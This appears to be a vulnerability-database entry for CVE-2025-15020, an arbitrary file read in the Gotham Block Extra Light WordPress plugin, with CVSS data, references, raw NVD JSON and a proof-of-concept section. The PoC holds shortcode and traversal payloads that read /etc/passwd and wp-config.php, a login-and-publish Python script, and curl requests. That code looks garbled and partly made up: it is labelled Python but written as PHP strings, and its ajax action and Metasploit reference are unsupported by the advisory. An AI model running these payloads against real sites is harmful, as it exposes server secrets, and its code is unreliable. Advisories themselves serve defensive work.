CVE-2025-15020

Description

The Gotham Block Extra Light plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.5.0 via the 'ghostban' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Gotham Block Extra Light插件 <= 1.5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
/**
 * CVE-2025-15020 PoC - Gotham Block Extra Light Plugin Arbitrary File Read
 * 
 * This PoC demonstrates the arbitrary file read vulnerability in the 
 * Gotham Block Extra Light plugin (versions <= 1.5.0) via the ghostban shortcode.
 * 
 * Usage: Authenticated attacker with contributor-level access or higher can exploit.
 */

// WordPress shortcode exploitation example
// Attacker creates a post/page with the following content:

$poc_shortcode = '[ghostban file_path="/etc/passwd"]';

// Directory traversal attack example
$poc_shortcode_traversal = '[ghostban file_path="../../../wp-config.php"]';

// Python requests PoC
$python_poc = '
import requests
from bs4 import BeautifulSoup

target = "http://target-wordpress-site.com"
username = "attacker"
password = "attacker_password"

# Login to WordPress
session = requests.Session()
login_url = f"{target}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/"
}
session.post(login_url, data=login_data)

# Create a post with malicious shortcode
post_url = f"{target}/wp-admin/post-new.php"
post_data = {
    "post_title": "Malicious Post",
    "content": "[ghostban file_path=\"/etc/passwd\"]",
    "post_status": "publish"
}
response = session.post(post_url, data=post_data)

# View the published post to trigger file read
post_link = f"{target}/?p=<POST_ID>"
result = session.get(post_link)
print(result.text)
';

// cURL PoC for quick testing
$curl_poc = '
# Read /etc/passwd
curl -X POST "http://target-wordpress-site.com/wp-admin/admin-ajax.php" \
  -d "action=ghostban_read&file_path=/etc/passwd" \
  -H "Cookie: wordpress_logged_in_<HASH>=<session_cookie>"

# Read wp-config.php using directory traversal
curl -X POST "http://target-wordpress-site.com/wp-admin/admin-ajax.php" \
  -d "action=ghostban_read&file_path=../../../wp-config.php" \
  -H "Cookie: wordpress_logged_in_<HASH>=<session_cookie>"
';

// Metasploit module reference
$msf_reference = '
# The vulnerability can be exploited using Metasploit framework
# Reference: https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/CVE-2025-15020
';

// Note: The actual exploitation requires authentication with contributor+ privileges
// and the ability to create/publish content on the WordPress site.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15020
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15020
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15020/
[4] VulDB https://vuldb.com/cve/CVE-2025-15020
[5] https://plugins.trac.wordpress.org/browser/gotham-block-extra-light/trunk/premium/ghostban.php?marks=56#L56
[6] https://plugins.trac.wordpress.org/changeset/3438393/
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/b194b241-d8f4-430c-b00c-d84190026bad?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15020", "sourceIdentifier": "[email protected]", "published": "2026-01-14T06:15:53.673", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gotham Block Extra Light plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.5.0 via the 'ghostban' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information."}, {"lang": "es", "value": "El plugin Gotham Block Extra Light para WordPress es vulnerable a Lectura Arbitraria de Archivos en todas las versiones hasta la 1.5.0, inclusive, a través del shortcode 'ghostban'. Esto permite que atacantes autenticados, con acceso de nivel de colaborador y superior, lean el contenido de archivos arbitrarios en el servidor, los cuales pueden contener información sensible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/gotham-block-extra-light/trunk/premium/ghostban.php?marks=56#L56", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3438393/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b194b241-d8f4-430c-b00c-d84190026bad?source=cve", "source": "[email protected]"}]}}